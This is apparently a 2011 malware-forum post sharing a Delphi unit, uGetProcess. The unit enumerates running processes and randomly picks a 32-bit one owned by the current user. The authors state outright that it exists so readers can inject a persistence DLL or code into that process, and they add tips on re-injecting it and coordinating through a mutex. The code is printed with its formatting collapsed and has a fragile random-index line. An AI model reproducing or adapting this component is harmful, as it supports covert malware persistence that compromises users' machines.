uGetProcess - Retrieve Injectable 32-bit Process
Post date: Nov 26, 2011 6:15:32 PM
This Unit is Made by Snify and MindfreaK together.
We went bored and searched for an x64 persistence method.
U can easily write your own x64 persistence with this ,
just write ur persistence dll or codeinjection and inject it
into an process u have found with GetInjectAbleProcess.
WARNING: Remember, the Process is chosen randomly and could be terminated
by itself , so u need an re-inject system which checks for an running
persistence module/dll/codeinjection. ( TIPP: Communicate via Mutex )
{ This Unit is Made by Snify and MindfreaK together.We went bored and searched for an x64 persistence method.
U can easily write your own x64 persistence with this ,
just write ur persistence dll or codeinjection and inject it
into an process u have found with GetInjectAbleProcess.
WARNING: Remember, the Process is chosen randomly and could be terminated
by itself , so u need an re-inject system which checks for an running
persistence module/dll/codeinjection. ( TIPP: Communicate via Mutex )
- OpenSC.WS -
}unit uGetProcess;interfaceuses SysUtils,TlHelp32,Windows;function GetInjectAbleProcess() : Integer;implementation type PTOKEN_USER = ^TOKEN_USER; _TOKEN_USER = record User: TSidAndAttributes; end; TOKEN_USER = _TOKEN_USER; function GetUserAndDomainFromPID(ProcessId: DWORD; var User, Domain: string): Boolean;var hToken: THandle; cbBuf: Cardinal; ptiUser: PTOKEN_USER; snu: SID_NAME_USE; ProcessHandle: THandle; UserSize, DomainSize: DWORD; bSuccess: Boolean;begin Result := False; ProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION, False, ProcessId); if ProcessHandle <> 0 then begin // EnableProcessPrivilege(ProcessHandle, 'SeSecurityPrivilege', True); if OpenProcessToken(ProcessHandle, TOKEN_QUERY, hToken) then begin bSuccess := GetTokenInformation(hToken, TokenUser, nil, 0, cbBuf); ptiUser := nil; while (not bSuccess) and (GetLastError = ERROR_INSUFFICIENT_BUFFER) do begin ReallocMem(ptiUser, cbBuf); bSuccess := GetTokenInformation(hToken, TokenUser, ptiUser, cbBuf, cbBuf); end; CloseHandle(hToken); if not bSuccess then begin Exit; end; UserSize := 0; DomainSize := 0; LookupAccountSid(nil, ptiUser.User.Sid, nil, UserSize, nil, DomainSize, snu); if (UserSize <> 0) and (DomainSize <> 0) then begin SetLength(User, UserSize); SetLength(Domain, DomainSize); if LookupAccountSid(nil, ptiUser.User.Sid, PChar(User), UserSize, PChar(Domain), DomainSize, snu) then begin Result := True; User := StrPas(PChar(User)); Domain := StrPas(PChar(Domain)); end; end; if bSuccess then begin FreeMem(ptiUser); end; end; CloseHandle(ProcessHandle); end;end;function IsWOW64: Boolean;type TIsWow64Process = function(Handle: THandle;var Res: BOOL): BOOL; stdcall;var IsWow64Result: BOOL; IsWow64Process: TIsWow64Process;begin IsWow64Process := GetProcAddress( GetModuleHandle('kernel32'), 'IsWow64Process' ); if Assigned(IsWow64Process) then begin IsWow64Process(GetCurrentProcess, IsWow64Result); Result := IsWow64Result; end else Result := False;end;Function GetUserFromWindows: string;Var UserName : string; UserNameLen : Dword;Begin UserNameLen := 255; SetLength(userName, UserNameLen) ; If GetUserName(PChar(UserName), UserNameLen) Then Result := Copy(UserName,1,UserNameLen - 1) Else Result := 'Unknown';End;function GetInjectAbleProcess() : Integer; // 32 bit onlyvarbProcess: boolean;hProcess: THandle;pe32Structur: TProcessEntry32;sUser: string;sDomain: string;sWindowsUser: string;TIsWow64Process : function( Handle: Windows.THandle; var Res: Windows.BOOL): Windows.BOOL; stdcall;hOpen: THandle;bIsWOW64: BOOL;bError: boolean;array_PID : array of integer;pidcounter : Integer;beginpidcounter := 0; sWindowsUser := GetUserFromWindows; pe32Structur.dwSize:=Sizeof(TProcessEntry32); hProcess :=CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); If IsWow64 = true then begin TIsWow64Process := GetProcAddress(GetModuleHandle('kernel32'), 'IsWow64Process'); if Assigned(TIsWow64Process) then begin // Writeln ( 'API geladen.' ) end; end; if Process32first(hProcess,pe32structur) then begin //Writeln ( IntToStr (pe32Structur.th32ProcessID) ); repeat bProcess:=Process32Next(hProcess,pe32structur); if GetCurrentProcessID <> pe32Structur.th32ProcessID then begin bError := false; if bProcess = true then begin GetUserAndDomainFromPID(pe32Structur.th32ProcessID,sUser, sDomain); if sWindowsUser = sUser then begin if IsWOW64 = true then //wenn 64 begin //Writeln ('OpenProcess: '+IntToStr(pe32Structur.th32ProcessID)); hOpen := Windows.OpenProcess ( PROCESS_QUERY_INFORMATION , false , pe32Structur.th32ProcessID ); if hOpen = 0 then begin //Writeln ('OpenProcess gescheitert.'); bError := true; end; if bError = false then begin TIsWow64Process ( hOpen , bIsWOW64 ); CloseHandle ( hOpen ); if bIsWOW64 = false then begin // Writeln ( '64Bit: '+IntToStr(pe32Structur.th32ProcessID) ) end; if bIsWOW64 = true then begin //Writeln ( {'32Bit: '+}IntToStr(pe32Structur.th32ProcessID) ); SetLength(array_PID, pidcounter+1); array_PID[pidcounter] := pe32Structur.th32ProcessID; inc(pidcounter); end; end; end; if ISWOW64 = false then //Wenn 32 begin //Writeln ( IntToStr (pe32Structur.th32ProcessID) ); SetLength(array_PID, pidcounter+1); array_PID[pidcounter] := pe32Structur.th32ProcessID; inc(pidcounter); end; end; end; end; until not bProcess; end; CloseHandle ( hProcess ); {$IFDEF Debug} for pidcounter := 0 to Length(array_PID) -1 do begin writeln ('INDEX['+inttostr(pidcounter)+'] ' + inttostr(array_PID[pidcounter])); end; {$ENDIF} randomize; result := array_PID[1 + random (Length(array_PID)-1)];end;end.